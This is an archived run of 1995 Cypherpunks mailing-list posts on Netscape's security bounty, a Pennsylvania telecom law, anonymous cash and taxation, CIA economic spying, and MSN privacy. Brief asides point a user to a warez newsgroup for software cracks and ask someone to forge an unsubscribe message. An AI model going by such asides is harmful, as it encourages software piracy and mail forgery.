- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMICZOioZzwIn1bdtAQEUoAGA3Q3nk9e3HA5l1jzG/DyJ8MjcZ+jfx/v3
4UM43jJZwTWFIZ7DLw9O44wvFHVMlj6K
=n1+8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 14 Oct 95 22:21:59 PDT
To: cypherpunks@toad.com
Subject: Re: applications
Message-ID: <199510150520.BAA10825@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <m0t3rzZ-000K7TC@mail.infinet.com>, zoetrope@infinet.com
(cYberpUnc) wrote:

>         I know this isn't what you guys generally talk about but I was curious.
> Off the top of your head do you know of any sites where I can get kracking
> apps for macs?  Any information would be greatly appreciated.

I suggest <news:alt.binaries.warez.mac>. Get C&N (Cracks and Numbers).
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMICaDioZzwIn1bdtAQFASQF/ausHvyFqDCdGQDwiY2zjGxhJ2DpHYb86
yGjpgvrqjT1YE98N2bTeS/Ejm1pxrXVl
=4wZO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 14 Oct 95 22:29:18 PDT
To: cypherpunks@toad.com
Subject: Re: Yes, indeed the PA law is for real!
Message-ID: <199510150527.BAA10870@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9510141649.AA20952@cfdevx1.lehman.com>, rfb@lehman.com (Rick
Busdiecker) wrote:

> I'm guessing that you're referring to this part of the law:
> 
>   (1) [makes or possesses any instrument, apparatus, equipment or]
>   makes, distributes, possesses, uses or assembles an unlawful
>   telecommunication device or modifies, alters, programs or reprograms
>   a telecommunication device designed, adapted or which can be used:

Own a non-approved computer (not using Government approved software) go to jail.
Historic comment: I predicted this on this very list ages ago. Even
mentioned "You read it here first".
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMICbwyoZzwIn1bdtAQEaMgGAs3ZFT2TmWbHxQg1xtkJKPUri4TBlpjbx
73dwbNh1TC0Ls+QG/q1xDStqc1rvMFs1
=BWyG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 14 Oct 95 22:45:17 PDT
To: cypherpunks@toad.com
Subject: Re: [noise] Re: Identity database, another attempt...
Message-ID: <199510150543.BAA10916@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.SOL.3.91.951014125249.28891A-100000@chivalry>,
ses@tipper.oit.unc.edu (Simon Spero) wrote:

> This probably dates back to the time when a Palestinian group tried to
> blow up an El Al flight from London by persuading the pregnant Irish
> girlfriend of one to carry a package for a friend. Flights from London
> have had the spiel ever since. El Al still does the best pre-flight
> screening (much more detailed questioning, and the security staff
> actually listen to the answers).

Agreed. Security at Heathrow is impeccable. Two guys armed with
Heckler&Koch MP-5 submachine guns every 25 meters. Expect to see the same
on US streets before long.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMICffioZzwIn1bdtAQGFBQGAig+QNg+1Zcbmbz3MXsz3EpV8dDHKmpFo
xMCY3+yXMHAqCELZLecbV59kgx/e0m2q
=1K8M
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Sun, 15 Oct 95 02:21:45 PDT
To: "cypherpunks@toad.com>
Subject: Karl Hess - L.A. area meeting
Message-ID: <199510150931.CAA13451@Chico.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

-----BEGIN PGP SIGNED MESSAGE-----

"Extremism in the defense of liberty is no vice, and let me  
remind you, moderation in the pursuit of justice is no virtue." 
 -- Aristotle, and a Goldwater speechwriter, but not Karl Hess. 

Politically Barry's Boy, Karl was often credited with Goldwater's 
most famous line, but he denied it when interviewed. Karl 
announced his Libertarian position in the book \Dear America\, 
followed by \Community Technology\, and \Capitalism For Kids\. 
 
     ---  T H E   K A R L   H E S S   C L U B  --- 
now in its second year of almost monthly dinners, invites you
to its sixteenth meeting on Monday, October 16, 1995.

     New Developments In Conspiracy Theory, Part II
     O N E   B A N K   T O   R U L E   U S   A L L

Last month we heard some "Conspiracy Classic." For 
Hallowe'en Partyarch, Paleolibertarian and Agorist tell us 
what's at "stake" in the latest Bankster cannibal 
bloodfeast and summon Murray Rothbard back from the grave 
to repel these vampires with a Cross of Gold!

Place: Marie Callender's, 4356 Lincoln Blvd., 
Marina del Rey (at west end of Marina del Rey [90] Fwy).
Time: 7:00 p.m. for dinner; 8 p.m. announcements; 
8:15 program.
Speakers: Wally Conger, SEK3, and Bob Weber.
Charge: $13.00 for program with buffet dinner 
including full-salad bar, roast turkey entree, 
and choice of three pies for dessert.
Tax and tip included!
Next Month: J. Neil Schulman Fires Back with 
\Self-Control, Not Gun Control\.
Coming soon: Robert Anton Wilson, Dr. John Hospers,
and Brad Linaweaver.

Posted by J. Kent Hastings, zeus@pinsight.com
http://www.pinsight.com/~zeus/
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIDNTzTxxI221vktAQESEgQAnojLCPg0+43EGBtYSMQHr34CvWs0Xc5U
2LidnuEI9w9awBiBuuVWuWfVk7YEpq2UWIe1Xr/8jZoWtjpEkIeLQRjt9D2WQHml
Vt2MiuIXbpcuc7GAhio7gMC7M5rsIVoxD6xd6MthcDOhbUa61a7xVma/QhIyyhcK
17MhZMeBl8Y=
=wGp1
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 14 Oct 95 23:52:52 PDT
To: cypherpunks@toad.com
Subject: Re: mental cryptography
Message-ID: <199510150651.CAA11041@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <v02130502aca5e351623c@[166.84.254.3]>, hal9001@panix.com
("Robert A. Rosenberg") wrote:

> On Sat, 14 Oct 1995, Nathan Loofbourrow wrote:
> > Boy, and isn't it fun to receive all the bounce messages from every
> > post to cypherpunks?
> 
> Part of the problem is his provider who is sending the bounce messages to
> the list and not the list owner (as shown in the Sender Header).

Would some kind soul please fakemail an unsub? [I got to get some sleep...]

TIA,
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMICvWyoZzwIn1bdtAQFI5AGAjYxCDWzpj1NTSHWyyV2S/iZfq3E6STH/
nYgkXgS0JyV8qiMKuo2U/d1rpb8wxQdg
=i/BL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cedric Ingrand" <cedric@isicom.fr>
Date: Sat, 14 Oct 95 18:06:30 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Netscape rewards are an insult
Message-ID: <199510150106.CAA29348@s2.isicom.fr>
MIME-Version: 1.0
Content-Type: text/plain


 
> 	I have a better idea.  How about an open market in break-in
> software.  We crack Netscape and offer the crack code to the highest
> bidder.  Bids start at US$25K per hole.  For the insult, Netscape has to
> outbid the competition by a factor of 2 to get the details of the hole.

You're talking gaping security holes. They're merely talking bugs. I
don't know if it's already been covered elsewhere, but I saw Jim
Clark at a press conference in Paris a couple of weeks ago, and he
more or less laid out what he intended to do about security:

"First of all, I am chairing an audit committee for security. All new 
security-related and encryption-related mechanisms that we build into 
our products has to go through this audit committee before being 
released. The audit committee hires outside auditors, security 
auditors, particularly RSA and experts out of academia, Ron Rivest 
from MIT and people like this to do the audit of our security 
systems. Another thing we're doing is publishing the source code 
which does the security so people can just see what the algorithms 
are. Had we done that in the first place, if we had published our 
source code, people wouldn't say 'ha ha! It's easy to guess that 
you're using this gate as the starting point of the random number'. 
So we think that by publishing the algorithms, having a security 
audit by an outsider auditor... it's sort of like the accounting 
profession, they have an audit committee on the board of directors, 
the audit is actually done by an outside financial institution and to 
some degree it's exactly what's happening in security. We think that 
we were the first company to introduce this technology to the 
internet and so we were the first company to come under attack. We 
were careless, and we're not going to be careless in the future."

I haven't seen Netscape deliver on this promise of publishing their 
encryption code, so I'll keep the promise on tape for a little while 
(-:

Best, Cedric.

 
---------------------------------------------------------
Cedric Ingrand - cedric@planetepc.fr - +33.1.43.98.88.56.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Sun, 15 Oct 95 04:37:08 PDT
To: cypherpunks@toad.com
Subject: TSB_pbs
Message-ID: <BBPgwkkAsmsM085yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From The Economist, Oct. 7, p.78:

   TSB, a British bank, held a launch party in August
   at Cyberia, London's first "Internet cafe", for its
   Digital Trip home page, aimed at attracting student
   customers.

I assume this refers to TSB Bank Channel Islands Limited, 8 David
Place, PO Box 597, St. Helier, Jersey (NOT Joisey!), JE4 8XW.

When I last checked (a couple of years ago), TSB offered Offshore
Premium Accounts -- interest-bearing checking accounts that pay 11.5
percent interest per annum on a minimum deposit of 2000 pounds, as
well as providing a VISA debit card.  TSB is said to be the tenth
largest bank in the world.  Quite an interesting addition to the
Net...anyone checked out their home page?

BTW, the American PBS "Frontline" show on Tuesday, Oct. 31 (in the
Denver area, anyway) will discuss "High Stakes in Cyberspace -- the
business rush to stake claims in cyberspace, otherwise known as the
Internet, may someday create a cyber-revolution."  Hopefully it will
be a worthy successor to their show about Caribbean money laundering,
though the blurb's conflation of cyberspace with the Internet is not
encouraging...

Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIDwuFRRFMq4NZY5AQECOgQAm1FJQyni4U7ulKvT8Zd3P1pEBieKXeqo
rxaCA14K/MhaTnaCcWix0vvPYzFjgnspxUpc7PtuP46w++ilrfZiYDM1BZ1+HpkZ
MZaSiH8W+cUkQAxDTuAVNve9PM8zj8Qv+CQ7mABqLu5+f93GubUQtMElEmikR69J
kL/2ewMllI4=
=O2Py
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 15 Oct 95 06:00:30 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199510151259.FAA03263@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>I want to see Netscape succeed, but when you hear about things like product
>being released on the net without warning those people responsible for
>supporting it, bug reports being ignored so a ship date can be made, and the
>like, it makes you really wonder.  I am finding problems with 2.0b1 that
>could have been found just by using the product for a couple of days!  Most
>of the problems I have seen with Netscape could be solved with better
>communications between departments within the company and some strong
>testing procedures.
>
I totally agree with this. There are an awful lot of GPFs I've been experiencing with 2.0 that I never experienced with 1.2, and I am still trying to figure out that cause. The first one happened like 5 minutes after I ran the program whilst it was loading the Netscape homepage! Another irritating one that should have been caught is the download time indicator. When I download a file, the estimated time taken is shown in hours!

These trivial problems are really quite inexcusable, and should've been caught with good quality assurance before it even went out the door.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 15 Oct 95 07:23:07 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape question transformed
Message-ID: <199510151421.HAA08833@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Oct 1995, Rob L wrote:

> Actually, it is not jeopardy that they get from doing so, but some of the 
> best bug finders and security experts on the planet.. for close to free.

Actually, this is a very dangerous game to play, because realistically
Netscape gets both, foe and friend.  And they risk not only the entire 
company by taking this action, but they also pose risk to the public.

They might get someone who responsibly tries to point out an incredibly
poor design methodology within ALL of Netscape's code -- the existing
installed code base as well as the new beta code.  Someone who points out 
this fatal design flaw to the public and not only to Netscape.

Or they might confront someone who announces that numerous pointers have
been placed in roulette programs making the Web under Netscape a little
more like playing Russian Roulette, rather than safe, fun entertainment.
Netscape clients might face a customized plexus, one that delivers dynamic
documents.  One time in six (if you're running CURRENT Netscape release
software) it deletes your WIN.INI.  Some machine in Bucharest reaches
right out, and wipes you clean.  Or maybe it just downloads all of your
Quicken files. 

Netscape is clearly not thinking clearly, here.

The issue here isn't "Bugs" and Netscape's so-called Bugs Bounty program. 
It's a broader question of design methodology and of design process.  Does
Netscape have a product that has any worth and utility??  Does Netscape
have a product which can go through a "Product Evaluation" and then a
"Certification Evaluation" as set out in the US Department of Defence's
Orange Book??  Or does Netscape's product fail the giggle test. 

> If hackers can find 10 bugs before final release, it means there is a 
> good chance that they will fix those bugs before final release.
> 
> Think of it this way.. you practice a new task until you are competent at 
> it.. beta code is the same.. it is the practice or scratch code that may 
> be refined into the final product.

I'll beg to differ on this one.  This is not about hackers, nor is this
about crackers.  We are not talking about some shareware game program
here.  Nor are we talking about a word processor, spreadsheet, or draw
program.  We are talking about a program that has a different mission
profile. 

The standard here is different.  

A bug in code that makes your system freeze is different than a sloppy
design methodology that allows someone to literally take complete control
of your machine from any other machine in the world, whether that machine
is foreign or domestic. 

Code which seeks to secure a public network connection, calls for a
different programming altitude, than writing common PC code. The
tolerances are different, the expectations are different, and the
challenge (which was summarized most cogently by a UK friend) distills to
a single basic issue. 

           How do you invite a few billion people into your 
           home without having one of them nick the silver??

Evaluation of technical computer security effectiveness is not
accomplished by the release of "practice code".  It has to start from the
ground up.  And it is certainly not assisted by having a corporate
communications policy that is geared to NOT opening a communications pipe
with someone who has attempted to offer constructive technical criticism. 

Let me make this absolutely clear.

It should not be up to non-US citizens like myself to safe-guard US
economic security, and protect vital national interests.  It is not my job
and certainly not my responsibility to protect the international public
and Fortune 500 companies from poor security. 

When that attempt is made however, the effort should not be stymied by
Netscape's thinly veiled attempt at information free-loading through
public-relations puffery.  From this vantage point, Netscape's press
releases have the stench of some two-bit penny stock hustler -- something
I'd expect from some Vancouver Stock Exchange promoter, rather than the
standard expected of a company with a Two Billion USD ($2,000,000,000)
market capitalization. 

After emailing the company more than two days ago, I would hope that a
communications channel would have been opened, or alternatively I would
have held out a hope that someone from Sun or Netscape might have made an
official comment here or publicly.  I would have expected something 
other than a stone-walling silence.

My Friday the Thirteenth post obviously has people shaken. Clearly, Friday
was not the day to comment about this serious problem.  There was no
utility in causing panic and disrupting trading in Netscape stock,
especially in a market that can only be characterized as frothy.  But now
here we stand, many hours and days later, with the questions raised
remaining unaddressed, and with my copyright restriction on my Friday 
post hereby, and herein explicitly waived.

The question is no longer simply a question of whether Netscape can
produce quality code, but a new question rises on the horizon.  Does
Netscape have the management depth and experience to meet daily corporate
requirements??  And is the promise of Internet commerce whether put
forward by Netscape, Microsoft or AT&T simply a pipe dream. 

A very risky game, they like to play ...

Or since I had already spoken of Dominick Dunne on Friday, perhaps a turn
this Sunday to Johnnie Cochrane and his fine choice of words: 

          "Whom will I trust as I will adders fang'd
          They bear the mandate; they must sweep my way,
          And marshall me to knavery.  Let it work;
          For tis the sport to have the engineer
          Hoist with his own petar: and 't shall go hard ..."


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sun, 15 Oct 95 04:41:40 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Idea Futures
In-Reply-To: <aca6045f180210043fe9@[205.199.118.202]>
Message-ID: <Pine.3.89.9510150743.C69264-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 15 Oct 1995, Timothy C. May wrote:

> (Some of his game theory simulations--on betting markets and
> preference-revealing--were a main inspiration for the "Crypto Anarchy Game"
> I put on at the first Cypherpunks meeting in '92.)
> 
How did that work out anyway? What were the rules and usual outcomes?
(Got a file on it anywhere? In your faq?)
Sounds like something that'd be nice to implement over the net. Great way
to get everyone's productivity reduced to zero. (insert wry smile) 

TIA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 15 Oct 95 05:06:41 PDT
To: Rick Busdiecker <rfb@lehman.com>
Subject: Re: Cybersecurity
In-Reply-To: <9509250107.AA05910@cfdevx1.lehman.com>
Message-ID: <Pine.SUN.3.91.950925060508.23639B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 24 Sep 1995, Rick Busdiecker wrote:

> I'm guessing that you're talking about the fact that fully applied
> crypto (e. g. fully anonymous digital cash) makes it essentially
> impossible to base a tax system on income.

Yep.

> With full application in place, a government would be forced to shift
> the basis of the tax system toward `real assets' and the receiving of
> goods and services within its borders.  However, outside of
> transactions involving pure information exchange, this simply shifts
> things from one side to the other in a relationship where the basic

I am also projecting a transition from physical to non-physical goods and 
services.  Thus most entertainment, financial services/investing, 
professional services, and indeed the rest of employment services will 
tend to be non-physical.  We see a lot of unbundling already in which 
services are split off from the more physical parts of a transaction.  
Drop shipping, contracting out, etc. 

> Earnings tend to correlate reasonably well with receiving goods and
> services, at least over long periods of times.  Also most people are
> more or less tied to a certain area of the world.  Certainly there are
> exceptions, but the average case is more relevant when considering

Say that it was 1750 and you were a French Physiocrat.  You might say 
that land and agriculture should be taxed because that represented the 
only important part of the economy and the nation's wealth.  The making 
of goods was insignificant.  You would have ignored what was to become a 
big part of the economy.  It is possible that the non-physical part of 
the economy will become much bigger than the physical.

Note that most money itself is non-physical.  And if the physical part of 
the economy is taxed and the non-physical isn't the market will be 
skewed in favor of non-taxed activities.  

Also even though most people are geographically bound, if their 
consumption switches to non physical goods, they can acquire these goods 
anonymously or securely from any place on earth.  So even if you don't 
travel, the locus of your transactions can.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 15 Oct 95 05:13:36 PDT
To: cypherpunks@toad.com
Subject: DUM_not
Message-ID: <199510151213.IAA09188@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-15-95. NYPaper, longish Page One semi-rehash, semi-
   disinfo of LATimes of July 23:


   "Emerging Role For the C.I.A.: Economic Spy."

      During the Clinton Administration's tense negotiations
      with Japan last spring Mickey Kantor received inside
      information gathered by the C.I.A.'s Tokyo station and
      the electronic eavesdropping equipment of the N.S.A.
      "But in the end, did it help much? Beyond some valuable
      detail we could not have gotten elsewhere, did it tell
      us much about which way Hashimoto would go? It would be
      hard to make that case."

      Many Administration officials suggest that the agency
      simply does not have the talent for such analysis. "The
      best graduate students don't go there and who can blame
      them?" said one of the Administration's top economic
      officials. "And yet, when you sit in a meeting, the
      views of the C.I.A. are often given more weight than the
      Council of Economic Advisors. Go figure."

      Allan E. Goodman, a former C.I.A. official and academic
      dean of Georgetown University's School of Foreign
      Service, said "We don't have the sources, we don't have
      the expertise. To develop an understanding of the people
      who trade currencies, their motivations, their
      lifestyles, you'd have to send your people to Harvard,
      Stanford and Wharton for years. Currency traders keep
      secrets very, very well, and to penetrate that would be
      the equivalent of cracking all the Japanese codes in
      World War II."


   DUM_not  (14 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sun, 15 Oct 95 05:19:17 PDT
To: cypherpunks@toad.com
Subject: bouncing mail
Message-ID: <Pine.3.89.9510150811.B23794-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


Can anyone get in touch with the bouncing mail guy, Jason P Jones
<jonesj@ala.usmc.mil> ? He needs to wipe that mailbox of his.
( I just tried to unsub him, I guess it's reassuring you can't get away 
with it without forging headers, which I can't do.)

From owner-cypherpunks  Sun Oct 15 05:19:24 1995
Return-Path: <owner-cypherpunks>
Received: by toad.com id AA09946; Sun, 15 Oct 95 05:19:24 PDT
Received: from panix.com by toad.com id AA09937; Sun, 15 Oct 95 05:19:20 PDT
Received: (from frissell@localhost) by panix.com (8.7/8.7/PanixU1.3) id IAA25104; Sun, 15 Oct 1995 08:19:18 -0400 (EDT)
Date: Sun, 15 Oct 1995 08:19:18 -0400 (EDT)
From: Duncan Frissell <frissell@panix.com>
To: Alan Westrope <adwestro@ouray.cudenver.edu>
Cc: cypherpunks@toad.com
Subject: Re: TSB_pbs
In-Reply-To: <BBPgwkkAsmsM085yn@ouray.cudenver.edu>
Message-Id: <Pine.SUN.3.91.951015081704.22935B-100000@panix.com>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-cypherpunks@toad.com
Precedence: bulk


On Sun, 15 Oct 1995, Alan Westrope wrote:

> I assume this refers to TSB Bank Channel Islands Limited, 8 David
> Place, PO Box 597, St. Helier, Jersey (NOT Joisey!), JE4 8XW.
> 

No, I would assume that it refers to the parent company TSB on the 
mainland UK.  It has an extensive branch network in the UK.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 15 Oct 95 05:53:59 PDT
To: cypherpunks@toad.com
Subject: Re: Yes, indeed the PA law is for real!
Message-ID: <9510151251.AA07819@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Historic comment: ... "You read it here first."

Nostradamus said it way before you.

This kind of dredging up old posts in order to claim certain foresight
intellectual properties is kinda silly.  Watcha gonna do, patent it?

It's gonna rain tomorrow.  You heard it here first.  Of course, I don't
plan on doing anything about it other than tell you all...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 15 Oct 95 09:10:34 PDT
To: cypherpunks@toad.com
Subject: Re: Int'l Money Laundering, Part the Second
Message-ID: <199510151610.JAA02950@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:31 PM 10/10/95 -0800, Douglas Barnes wrote:
> When you combine these elements, you get a strategy that
> permits the US government to confiscate worldwide correspondent
> accounts of banks, even if they don't have a US presence.

This is doubtless one of the reasons why the US$ is rapidly losing 
its place as the preferred currency for international transactions.

>  acceptance of US-dollar negotiable instruments by a bank anywhere
>  in the world outside of the US renders the bank susceptible
>  to US criminal jurisdiction in the money laundering field.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 15 Oct 95 09:31:27 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: Idea Futures
Message-ID: <aca6848b190210045cc4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:40 AM 10/15/95, s1018954@aix2.uottawa.ca wrote:
>On Sun, 15 Oct 1995, Timothy C. May wrote:
>
>> (Some of his game theory simulations--on betting markets and
>> preference-revealing--were a main inspiration for the "Crypto Anarchy Game"
>> I put on at the first Cypherpunks meeting in '92.)
>>
>How did that work out anyway? What were the rules and usual outcomes?
>(Got a file on it anywhere? In your faq?)
>Sounds like something that'd be nice to implement over the net. Great way
>to get everyone's productivity reduced to zero. (insert wry smile)

To educate the folks about the technologies now more common (mixes, digital
cash, information markets, data havens...), we simulated on paper these
things. For example, certain people were randomly assigned the role of
being a "mix" (remailer), with envelopes addressed to them being openable
only by them, and with them then remailing to the next destination.

The game went on for about 5 hours, amidst much confusion and hilarity, and
helped to show people how ecologies of anonymous and pseudonymous entities
could interact.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 15 Oct 95 07:07:57 PDT
To: cypherpunks@toad.com
Subject: ORW_lea
Message-ID: <199510151407.KAA15071@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-15-95. NYPaper:


   "Law Enforcement and Privacy Interests Clash on
   Technology."

      The legality of mobile data terminals, which put records
      at the fingertips of officers in their cars, is in
      question. Some other machines could well be props in a
      James Bond movie: long-range eavesdropping devices that,
      placed in a briefcase, pick up conversations a football
      field away, or infrared radar monitors that, mounted on
      a car, can detect weapons on a person a half-mile away.
      For law enforcement officials, they are new-generation
      weapons in the war on crime that enable the police to
      better protect the public, even at the expense of a
      little privacy. But for civil libertarians, they conjure
      Orwellian images of Big Brother armed with technologies
      that are subject to abuse and prone to error.


   ORW_lea  (8 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 15 Oct 95 07:28:12 PDT
To: cypherpunks@toad.com
Subject: National Insitute of Justice
Message-ID: <199510151428.KAA16889@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


For more on the NIJ, oft-cited by The NYT as the sponsor of 
wizard crime fighting devices, see:


     URL: http://ncjrs.aspensys.com:81/aboutnij.html


There are helpful links there to the ever-expanding universe of 
the terrifying trust-me evangelists.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@cmu.edu (Matthew Ghio)
Date: Sun, 15 Oct 95 10:31:08 PDT
To: cypherpunks@toad.com
Subject: Re: Yes, indeed the PA law is for real!
In-Reply-To: <Pine.SUN.3.91.951013183116.11492A@access5.digex.net>
Message-ID: <m0t4U4H-00134sC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Rick Busdiecker (rfb@lehman.com) wrote:
> I'm guessing that you're referring to this part of the law:

>   (1) [makes or possesses any instrument, apparatus, equipment or]
>   makes, distributes, possesses, uses or assembles an unlawful
>   telecommunication device or modifies, alters, programs or reprograms
>   a telecommunication device designed, adapted or which can be used:
    . . .
>   (ii) to conceal or to assist another to conceal from any [supplier
>   of telecommunications] telecommunication service provider or from any
>   lawful authority the existence or place of origin or of destination
>   of any telecommunication; or

Well, given that I haven't seen any Bell employees rushing to tear out
payphones, I suspect that if it ever went to court, they'd have to show
intent to commit or assist fraud.  Since anonymous remailers (and
payphones, prepaid calling cards, etc) have legitimate uses, they can't
prove you were intending to assist crime by providing those services.
There's also the ECPA protections...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julius Cisek <jules@netscape.com>
Date: Sun, 15 Oct 95 11:49:34 PDT
To: cypherpunks@toad.com
Subject: Re: Guess what I found...
In-Reply-To: <199510140816.CAA07071@bert.cs.byu.edu>
Message-ID: <30815766.3A8D@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Donald M. Kitchen wrote:
> rryan@blackhills.com (Richard Ryan) writes:
> >Had my first hard core, provable case of MSN reading someone's drive. Store
> >Client had entered fantasy company name upon installing a program. Forgot about
> >it, didn't tell anyone. 2 days after downloading a simple text file from MSN a
> >junk mail offering from Pitney-Bowes showed up in his snail mailbox addressed
> >to him c/o the fantasy company. Somebody is playing somewhere they shouldn't
> >be. Any comments, Microsoft?
> 
> I registered as Richard E. Graves (changing middle initials and adding an
> unnecessary suite number to your address are good ways to track who has
> been selling whom your address). Richard E. Graves also received mail from
> Pitney-Bowes.
> 
> Microsoft says they don't sell their mailing lists. Clearly, someone has
> taken advantage of security holes in the NT servers that make up MSN and
> *stole* the mailing lists. Maybe unauthorized external access accounts for
> the abysmal performance of MSN, in part.

Hmmm...  Did you guys check the box that says not to give your name out when 
signing up?  I did and I haven't gotten any junk mail yet.  I've been using MSN for 
half a year now.  Of course if there is a security hole, then the checkbox would 
hardly matter.

-- 

~Jules (Julius Cisek)   /- __  -   mailto:jules@netscape.com
Server Eng, NETSCAPE  /\ >\=/\ --- http://home.netscape.com/people/jules
MtnView-CA-USA-Earth  \/   -\/ --  p:415.528.2968 f:415.528.4122
          ---===> COGITO ERGO VROOM <===---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sun, 15 Oct 95 11:48:36 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510151855.OAA20783@slack.lne.com>
